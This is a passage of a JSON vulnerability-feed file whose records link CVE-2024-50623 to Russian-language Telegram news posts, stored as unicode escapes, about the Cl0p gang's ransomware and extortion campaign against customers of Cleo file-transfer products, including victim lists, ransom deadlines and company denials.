\u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u0445\u0430\u043a\u0435\u0440\u043e\u0432 \u0432 \u0441\u0435\u0442\u044c.\n\n\u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-12-11T11:00:07.000000Z"}, {"uuid": "4951e28a-6fb7-4813-b91f-a895a3355ff3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/true_secator/6595", "content": "\u0412 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f \u0431\u0430\u043d\u0434\u0430 Cl0p \u043d\u0430\u043c\u0435\u0440\u0435\u043d\u0430 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u0438\u043c\u0435\u043d\u0430 \u0441\u0432\u043e\u0438\u0445 66 \u0436\u0435\u0440\u0442\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0430 \u0434\u043d\u044f\u0445 \u0440\u0430\u0437\u043c\u0435\u0441\u0442\u0438\u043b\u0438\u0441\u044c \u043d\u0430 DLS \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 \u0432 \u0440\u0430\u043c\u043a\u0430\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 0-day \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 \u043e\u0442 \u0440\u0430\u0437\u0440\u0430\u0431\u043e\u0442\u0447\u0438\u043a\u0430 \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u043e\u0433\u043e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f Cleo.\n\n\u0412 \u0441\u0435\u0440\u0435\u0434\u0438\u043d\u0435 \u0434\u0435\u043a\u0430\u0431\u0440\u044f Cleo \u0432\u0437\u044f\u043b\u0438 \u043d\u0430 \u0441\u0435\u0431\u044f \u043e\u0442\u0432\u0435\u0440\u0436\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430 \u0430\u0442\u0430\u043a\u0438 Cleo, \u0437\u0430\u044f\u0432\u0438\u0432 \u043e \u0432\u0437\u043b\u043e\u043c\u0435 \u0434\u043e\u0441\u0442\u0430\u0442\u043e\u0447\u043d\u043e\u0433\u043e \u0431\u043e\u043b\u044c\u0448\u043e\u0433\u043e \u0447\u0438\u0441\u043b\u0430 \u0446\u0435\u043b\u0435\u0439. \u041d\u0430 DLS \u043f\u043e\u043c\u0435\u0441\u0442\u0438\u043b\u0438 \u0442\u0435\u0445, \u0441 \u043a\u0435\u043c \u0435\u0449\u0435 \u0445\u0430\u043a\u0435\u0440\u0430\u043c \u043d\u0435 \u0443\u0434\u0430\u043b\u043e\u0441\u044c \u0441\u0432\u044f\u0437\u0430\u0442\u044c\u0441\u044f \u0434\u043b\u044f \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u044f \u0443\u0441\u043b\u043e\u0432\u0438\u0439 \u0432\u044b\u043a\u0443\u043f\u0430.\n\n\u041e\u0434\u043d\u0443 \u0438\u0437 \u043d\u0438\u0445 \u0432\u0441\u0435 \u0436\u0435 \u043e\u043f\u0443\u0431\u043b\u0438\u0447\u0438\u043b\u0438 \u0434\u043b\u044f \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f \u0441\u0432\u043e\u0438\u0445 \u043f\u043b\u0430\u043d\u043e\u0432. \u0416\u0435\u0440\u0442\u0432\u043e\u0439 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043f\u043e\u0441\u0442\u0430\u0432\u0449\u0438\u043a \u041f\u041e \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0446\u0435\u043f\u043e\u0447\u043a\u0430\u043c\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043e\u043a Blue Yonder. \u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u044f \u043e\u0441\u0442\u0430\u0432\u0448\u0438\u0445\u0441\u044f \u043e\u0431\u0435\u0449\u0430\u044e\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c 30 \u0434\u0435\u043a\u0430\u0431\u0440\u044f, \u0435\u0441\u043b\u0438 \u0442\u043e\u043b\u044c\u043a\u043e \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 \u043d\u0435 \u0432\u044b\u0439\u0434\u0435\u0442 \u043d\u0430 \u0441\u0432\u044f\u0437\u044c.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u0443\u044e\u0442 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u0435 \u043f\u043e\u0434\u043e\u0437\u0440\u0435\u043d\u0438\u044f, \u0447\u0442\u043e\u00a0\u0430\u0442\u0430\u043a\u0430 Blue Yonder, \u043f\u043e\u0440\u0430\u0437\u0438\u0432\u0448\u0430\u044f \u0441\u043b\u0435\u0434\u043e\u043c Starbucks \u0438 \u043d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043a\u0440\u0443\u043f\u043d\u044b\u0435 \u0441\u0435\u0442\u0438 \u043e\u0431\u0449\u0435\u043f\u0438\u0442\u0430, \u0431\u044b\u043b\u0430 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u0435\u043d\u0430 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Cleo.\n\n\u041f\u0440\u0430\u0432\u0434\u0430 \u0442\u043e\u0433\u0434\u0430, \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c\u00a0\u0437\u0430 \u0430\u0442\u0430\u043a\u0443 Blue Yonder \u0432\u0437\u044f\u043b\u0430 \u043d\u0430 \u0441\u0435\u0431\u044f \u043d\u043e\u0432\u0430\u044f \u0433\u0440\u0443\u043f\u043f\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c Termite, \u043d\u043e \u043f\u043e\u0437\u0436\u0435 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u0437\u0430 \u043d\u0435\u0439 \u0441\u0442\u043e\u044f\u0442 \u0443\u0436\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0435 \u043f\u043e MOVEit \u0438 \u043f\u0440\u043e\u0447\u0438\u043c \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u0443\u0447\u0430\u0441\u0442\u043d\u0438\u043a\u0438 Cl0p.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u043b\u0430\u0433\u0430\u044e\u0442, \u0447\u0442\u043e \u0437\u0430 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0430 Harmony, VLTrader \u0438 LexiCom \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c CVE-2024-50623 \u0438 CVE-2024-55956 \u043c\u043e\u0433\u0443\u0442 \u0441\u0442\u043e\u044f\u0442\u044c \u0438 \u0434\u0440\u0443\u0433\u0438\u0435 \u0433\u0440\u0443\u043f\u043f\u044b \u0443\u0433\u0440\u043e\u0437 \u0441 \u0442\u0435\u0445 \u043f\u043e\u0440, \u043a\u0430\u043a \u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e \u043e \u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043e\u0432\u0430\u043d\u0438\u0438 \u043f\u0440\u043e\u0431\u043b\u0435\u043c \u0432 \u0440\u0435\u0448\u0435\u043d\u0438\u044f\u0445 Cleo.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f, \u0447\u0442\u043e \u0443 Cleo \u0431\u043e\u043b\u0435\u0435 4000 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432, \u043c\u0430\u0441\u0448\u0442\u0430\u0431 \u043d\u043e\u0432\u043e\u0433\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430 \u043c\u043e\u0436\u0435\u0442 \u043e\u043a\u0430\u0437\u0430\u0442\u044c\u0441\u044f \u0441\u043e\u043f\u043e\u0441\u0442\u0430\u0432\u0438\u043c \u0441 \u043f\u0440\u043e\u0448\u043b\u044b\u043c\u0438 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f\u043c\u0438 Cl0p. \u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2024-12-28T13:06:09.000000Z"}, {"uuid": "7f127d93-f87a-4d38-a839-70962b4bf59d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/true_secator/6630", "content": "\u0411\u0430\u043d\u0434\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Clop \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u0441\u0432\u043e\u044e \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044e, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u043e\u043c \u0440\u0435\u0448\u0435\u043d\u0438\u0439 \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 Cleo, \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0432 \u043d\u0430 \u0441\u0432\u043e\u0435\u043c DLS \u0438\u043c\u0435\u043d\u0430 59 \u0436\u0435\u0440\u0442\u0432, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043d\u0435 \u0432\u044b\u0448\u043b\u0438 \u0441 \u043d\u0438\u043c\u0438 \u043d\u0430 \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u044b \u043f\u043e \u043f\u043e\u0432\u043e\u0434\u0443 \u0432\u044b\u043a\u0443\u043f\u0430, \u0441\u0434\u0435\u0440\u0436\u0430\u0432 \u0434\u0430\u043d\u043d\u044b\u0435 \u0432 \u0434\u0435\u043a\u0430\u0431\u0440\u0435 \u043e\u0431\u0435\u0449\u0430\u043d\u0438\u044f.\n\n\u041e\u0442\u043a\u0440\u044b\u0432\u0448\u0430\u044f \u044f\u0449\u0438\u043a \u041f\u0430\u043d\u0434\u043e\u0440\u044b CVE-2024-50623\u00a0(\u043e\u0446\u0435\u043d\u043a\u0430 CVSS 8,8) \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 LexiCom, VLTransfer \u0438 Harmony \u043e\u0442 Cleo, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0435\u0435 \u0432 \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0430\u0446\u0438\u0438 \u043f\u043e \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0437\u0430 \u043e\u043a\u0442\u044f\u0431\u0440\u044c 2024 \u0433\u043e\u0434\u0430, \u043f\u0440\u0435\u0436\u0434\u0435 \u0447\u0435\u043c\u00a0\u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0435\u0435 \u0443\u0436\u0435 \u043c\u0430\u0441\u0441\u043e\u0432\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u044e\u0442.\n\n\u0422\u043e\u0433\u0434\u0430 9 \u0434\u0435\u043a\u0430\u0431\u0440\u044f \u0432 \u0438\u043d\u0444\u043e\u0441\u0435\u043a-\u0441\u043e\u043e\u0431\u0449\u0435\u0441\u0442\u0432\u0435 \u043d\u0430\u0447\u0430\u043b\u0438 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0442\u044c\u0441\u044f \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u044f \u043e\u0431 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u041f\u041e \u0434\u043b\u044f \u043f\u0435\u0440\u0435\u0434\u0430\u0447\u0438 \u0444\u0430\u0439\u043b\u043e\u0432 Cleo, \u0430 Huntress \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u043e \u0440\u0430\u0441\u043a\u0440\u044b\u043b\u0430 \u0441\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0432 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u044e\u0449\u0435\u0439\u0441\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0438 \u0432\u0437\u043b\u043e\u043c\u043e\u0432 \u0435\u0435 \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432.\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Huntress \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u043b\u0438 PoC \u0438 \u0432\u044b\u044f\u0441\u043d\u0438\u043b\u0438, \u0447\u0442\u043e \u043f\u0430\u0442\u0447 \u0432 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0442\u0435\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u043d\u0435 \u0443\u0441\u0442\u0440\u0430\u043d\u044f\u043b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c, \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u0432, \u0447\u0442\u043e \u043f\u043e\u043b\u043d\u043e\u0441\u0442\u044c\u044e \u043f\u0440\u043e\u043f\u0430\u0442\u0447\u0435\u043d\u043d\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0441 5.8.0.21 \u043f\u043e-\u043f\u0440\u0435\u0436\u043d\u0435\u043c\u0443 \u043e\u0441\u0442\u0430\u044e\u0442\u0441\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u044b.\n\n\u0412 \u0441\u0432\u043e\u044e \u043e\u0447\u0435\u0440\u0435\u0434\u044c, Clop \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442, \u0447\u0442\u043e \u0441\u0432\u044f\u0437\u0430\u043b\u0430\u0441\u044c \u0441 \u043f\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u0432\u0448\u0438\u043c\u0438 \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f\u043c\u0438, \u043d\u043e \u0442\u0435 \u043f\u0440\u043e\u0438\u0433\u043d\u043e\u0440\u0438\u0440\u043e\u0432\u0430\u043b\u0438 \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u044b \u043e \u0432\u044b\u043a\u0443\u043f\u0435, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u0431\u0430\u043d\u0434\u0430 \u0443\u0433\u0440\u043e\u0436\u0430\u0435\u0442 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u0442\u044c \u0443\u043a\u0440\u0430\u0434\u0435\u043d\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435 18 \u044f\u043d\u0432\u0430\u0440\u044f 2025 \u0433\u043e\u0434\u0430.\n\n\u041d\u0435\u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0438\u0437 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 Clop \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u0439-\u0436\u0435\u0440\u0442\u0432 \u043e\u0441\u043f\u043e\u0440\u0438\u043b\u0438 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0430\u043d\u0434\u044b \u0438 \u043e\u0442\u0440\u0438\u0446\u0430\u044e\u0442 \u0444\u0430\u043a\u0442 \u0432\u0437\u043b\u043e\u043c\u0430. \n\n\u0412 \u0447\u0430\u0441\u0442\u043d\u043e\u0441\u0442\u0438, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u044c \u0430\u043c\u0435\u0440\u0438\u043a\u0430\u043d\u0441\u043a\u043e\u0433\u043e \u0433\u0438\u0433\u0430\u043d\u0442\u0430 \u043f\u043e \u043f\u0440\u043e\u043a\u0430\u0442\u0443 \u0430\u0432\u0442\u043e\u043c\u043e\u0431\u0438\u043b\u0435\u0439 Hertz\u00a0\u0441\u043e\u043e\u0431\u0449\u0438\u043b, \u0447\u0442\u043e \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043e\u0441\u0432\u0435\u0434\u043e\u043c\u043b\u0435\u043d\u0430 \u043e \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u044f\u0445 \u0445\u0430\u043a\u0435\u0440\u043e\u0432, \u043d\u043e \u043d\u0430 \u0434\u0430\u043d\u043d\u044b\u0439 \u043c\u043e\u043c\u0435\u043d\u0442 \u043d\u0435 \u0440\u0430\u0441\u043f\u043e\u043b\u0430\u0433\u0430\u0435\u0442 \u043d\u0438\u043a\u0430\u043a\u0438\u043c\u0438 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432\u0430\u043c\u0438 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0434\u0430\u043d\u043d\u044b\u0435 Hertz \u0438\u043b\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u044b\u043b\u0438 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044b.\n\n\u0412 Linfox, \u0430\u0432\u0441\u0442\u0440\u0430\u043b\u0438\u0439\u0441\u043a\u043e\u0439 \u043b\u043e\u0433\u0438\u0441\u0442\u0438\u0447\u0435\u0441\u043a\u043e\u0439 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0442\u0430\u043a\u0436\u0435 \u0432\u044b\u0440\u0430\u0437\u0438\u043b\u0438 \u043d\u0435\u0441\u043e\u0433\u043b\u0430\u0441\u0438\u044f \u0441 \u0443\u0442\u0432\u0435\u0440\u0436\u0434\u0435\u043d\u0438\u044f\u043c\u0438 \u0431\u0430\u043d\u0434\u044b, \u0437\u0430\u044f\u0432\u0438\u0432, \u0447\u0442\u043e  \u0432\u043e\u0432\u0441\u0435 \u043d\u0435 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435 Cleo \u0438 \u043d\u0435 \u0441\u0442\u0430\u043b\u043a\u0438\u0432\u0430\u043b\u0430\u0441\u044c \u0441 \u043a\u0438\u0431\u0435\u0440\u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c\u0438, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u043c\u0438 \u0441 \u0435\u0435 \u0441\u043e\u0431\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u043c\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c\u0438.\n\n\u041f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u0438\u0442\u0435\u043b\u0438 Arrow Electronics \u0438 Western Alliance Bank \u0442\u0430\u043a\u0436\u0435 \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u043d\u0438\u043a\u0430\u043a\u0438\u0445 \u0434\u043e\u043a\u0430\u0437\u0430\u0442\u0435\u043b\u044c\u0441\u0442\u0432 \u0442\u043e\u0433\u043e, \u0447\u0442\u043e \u0438\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0431\u044b\u043b\u0438 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u044b.\u00a0\n\n\u0422\u0435\u043c \u043d\u0435 \u043c\u0435\u043d\u0435\u0435, \u043f\u043e \u043a\u0440\u0430\u0439\u043d\u0435\u0439 \u043c\u0435\u0440\u0435 \u043e\u0434\u043d\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0434\u0438\u043b\u0430 \u0444\u0430\u043a\u0442 \u0432\u0442\u043e\u0440\u0436\u0435\u043d\u0438\u044f.\n\n\u041d\u0435\u043c\u0435\u0446\u043a\u0438\u0439 \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u0434\u0441\u0442\u0432\u0435\u043d\u043d\u044b\u0439 \u0433\u0438\u0433\u0430\u043d\u0442 Covestro \u043f\u0440\u0438\u0437\u043d\u0430\u043b, \u0447\u0442\u043e \u0431\u0430\u043d\u0434\u0430 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u043d\u044b\u043c \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430\u043c \u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0435\u0433\u043e \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u043a \u043a\u0430\u043a\u0438\u043c \u0438\u043c\u0435\u043d\u043d\u043e \u043d\u0435 \u0440\u0430\u0437\u0433\u043b\u0430\u0448\u0430\u0435\u0442.\n\n\u0423\u0447\u0438\u0442\u044b\u0432\u0430\u044f \u043d\u0430 \u0441\u0447\u0435\u0442\u0443 Clop \u0443\u0441\u043f\u0435\u0448\u043d\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u0441 MOVEit Transfer \u0438 GoAnywhere, \u0432 \u0434\u043e\u0441\u0442\u043e\u0432\u0435\u0440\u043d\u043e\u0441\u0442\u0438 \u0437\u0430\u044f\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0430\u043d\u0434\u044b \u0442\u043e\u0447\u043d\u043e \u0441\u043e\u043c\u043d\u0435\u0432\u0430\u0442\u044c\u0441\u044f \u043d\u0435 \u0441\u0442\u043e\u0438\u0442.\n\n\u041d\u043e \u0431\u0443\u0434\u0435\u043c \u043f\u043e\u0441\u043c\u043e\u0442\u0440\u0435\u0442\u044c.", "creation_timestamp": "2025-01-17T14:15:08.000000Z"}, {"uuid": "6cc949ed-a939-469a-9ffe-a90266b77de0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-50623", "type": "exploited", "source": "https://t.me/true_secator/6581", "content": "\u0412\u0437\u044f\u0432\u0448\u0430\u044f \u043d\u0430 \u0441\u0435\u0431\u044f \u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0441\u0442\u044c \u0437\u0430 \u043d\u043e\u0432\u0443\u044e \u0434\u0435\u043b\u044e\u0433\u0443, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u0443\u044e \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u043e\u043c \u043a\u043b\u0438\u0435\u043d\u0442\u043e\u0432 Cleo, \u0431\u0430\u043d\u0434\u0430 \u0432\u044b\u043c\u043e\u0433\u0430\u0442\u0435\u043b\u0435\u0439 Clop \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b\u0430 \u043a \u0441\u0431\u043e\u0440\u0443 \u0432\u044b\u043a\u0443\u043f\u043e\u0432 \u0441\u043e \u0441\u0432\u043e\u0438\u0445 \u0436\u0435\u0440\u0442\u0432, \u0447\u0438\u0441\u043b\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u0434\u043e\u0441\u0442\u0438\u0433\u043b\u043e 66.\n\n\u0421\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0435\u0435 \u043e\u0431\u044a\u044f\u0432\u043b\u0435\u043d\u0438\u0435 \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 DLS, \u0433\u0434\u0435 \u043f\u043e\u0441\u0442\u0440\u0430\u0434\u0430\u0432\u0448\u0438\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u044f\u043c \u043f\u0440\u0435\u0434\u043b\u043e\u0436\u0435\u043d\u043e \u0443\u0440\u0435\u0433\u0443\u043b\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0432\u044b\u043f\u043b\u0430\u0442\u044b \u043f\u043e \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u0430\u043c \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435\u043c 48 \u0447\u0430\u0441\u043e\u0432.\n\n\u0425\u0430\u043a\u0435\u0440\u044b \u0441\u0432\u044f\u0437\u0430\u043b\u0438\u0441\u044c \u0441 \u043d\u0438\u043c\u0438 \u043d\u0430\u043f\u0440\u044f\u043c\u0443\u044e \u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u0438\u043b\u0438 \u0434\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0441\u0441\u044b\u043b\u043a\u0438 \u043d\u0430 \u0437\u0430\u0449\u0438\u0449\u0435\u043d\u043d\u044b\u0435 \u0447\u0430\u0442\u044b \u0434\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u043e\u0432 \u043f\u043e \u0432\u044b\u043a\u0443\u043f\u0443.\n\n\u041f\u043e\u043c\u0438\u043c\u043e \u044d\u0442\u043e\u0433\u043e \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u0438\u043b\u0438 \u0434\u0430\u0436\u0435 \u0430\u0434\u0440\u0435\u0441\u0430 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b, \u043f\u043e \u043a\u043e\u0442\u043e\u0440\u044b\u043c \u0436\u0435\u0440\u0442\u0432\u044b \u043c\u043e\u0433\u0443\u0442 \u0432\u044b\u0439\u0442\u0438 \u0441 \u0431\u0430\u043d\u0434\u043e\u0439 \u043d\u0430 \u0441\u0432\u044f\u0437\u044c.\n\n\u041f\u0440\u0438\u0447\u0435\u043c \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0439 \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 \u0441\u043f\u0438\u0441\u043e\u043a \u0436\u0435\u0440\u0442\u0432 \u0432\u043a\u043b\u044e\u0447\u0430\u0435\u0442 \u043b\u0438\u0448\u044c \u0447\u0430\u0441\u0442\u043d\u044b\u0435 \u043d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0445 \u0441 \u0438\u043d\u0446\u0438\u0434\u0435\u043d\u0442\u043e\u043c \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439. \u0412 \u0441\u043b\u0443\u0447\u0430\u0435, \u0435\u0441\u043b\u0438 \u0432 \u0442\u0435\u0447\u0435\u043d\u0438\u0435 48 \u0447\u0430\u0441\u043e\u0432 \u043f\u0435\u0440\u0435\u0433\u043e\u0432\u043e\u0440\u044b \u043d\u0435 \u043d\u0430\u0447\u043d\u0443\u0442\u0441\u044f - Clop \u043e\u0431\u0435\u0449\u0430\u0435\u0442 \u0440\u0430\u0441\u043a\u0440\u044b\u0442\u044c \u0438\u0445 \u043f\u043e\u043b\u043d\u044b\u0435 \u0434\u0430\u043d\u043d\u044b\u0435.\n\n\u0425\u0430\u043a\u0435\u0440\u044b \u043e\u0442\u043c\u0435\u0447\u0430\u044e\u0442, \u0447\u0442\u043e \u0432 \u0441\u043f\u0438\u0441\u043a\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u044b 